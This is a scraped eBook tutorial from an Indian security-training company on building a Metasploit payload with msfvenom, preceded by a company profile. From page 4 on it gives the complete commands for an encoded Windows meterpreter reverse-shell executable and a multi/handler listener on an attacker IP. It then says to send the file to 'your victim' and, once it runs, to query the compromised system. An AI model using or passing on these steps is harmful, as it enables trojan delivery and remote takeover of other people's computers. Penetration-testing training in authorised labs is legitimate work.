8

Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

Embed Size (px)

Citation preview

Page 1: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit
Page 2: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

SECUGENIUS SECURITY SOLUTIONS

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing new

ideas to influence the technological minds of the youngsters

Looking at the number of Cyber Crimes since last many years, We at Secugenius Security

Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.

Page 3: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

Msfvenom Exploit Hacking With Metasploit

Product ID No: SG/ODL/13010

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni

Secugenius Security Solutions

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

[email protected], [email protected]

www.secugenius.com , www.seculabs.in

Page 4: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

What is Msfvenom? Msfvenom is a combination of Msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

a) One single tool

b) Standardized command line options

c) Increased speed

Step 1 – You have to create an exploit generated by msfvenom with meterpreter payload and shikata_ga_nai Encoder by typing this command, root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp –o

For all Available Options you can use “msfvenom –h”

Page 5: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

Step 2 – Now We need to be set up LHOST and LPORT to make this exploit work by typing this command, root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp –e x86/shikata_ga_nai –I 5 –b „\x00‟ LHOST=192.168.17.133 LPORT=443 –f exe > chetansoni.exe

Here, -p windows/meterpreter/reverse_tcp = it is reverse_tcp payload -e x86/shikata_ga_nai = it is a best encoder -i 5-b '\x00' = it removes the bad characters Step 3 – Now we need to set up the listener on our attacker computer by using multi handler so start Metasploit and typing this command, root@bt:~# use exploit/multi/handler

Page 6: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

To Set Payload type this command root@bt:~# set payload windows/meterpreter/reverse_tcp

To check all options type root@bt:~# show options

To Set LHOST type root@bt:~# set LHOST 192.168.17.133

Page 7: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

To Set LPORT type root@bt:~# set LPORT 443

Step 4 – Here’s the location of the file chetansoni.exe, so send this File to your victim.

Page 8: Seculabs eBook - Msfvenom Exploit Hacking With Metasploit

When you send the exploit to victim, and victim executes it, we got this:

Type “sysinfo” for checking System Information.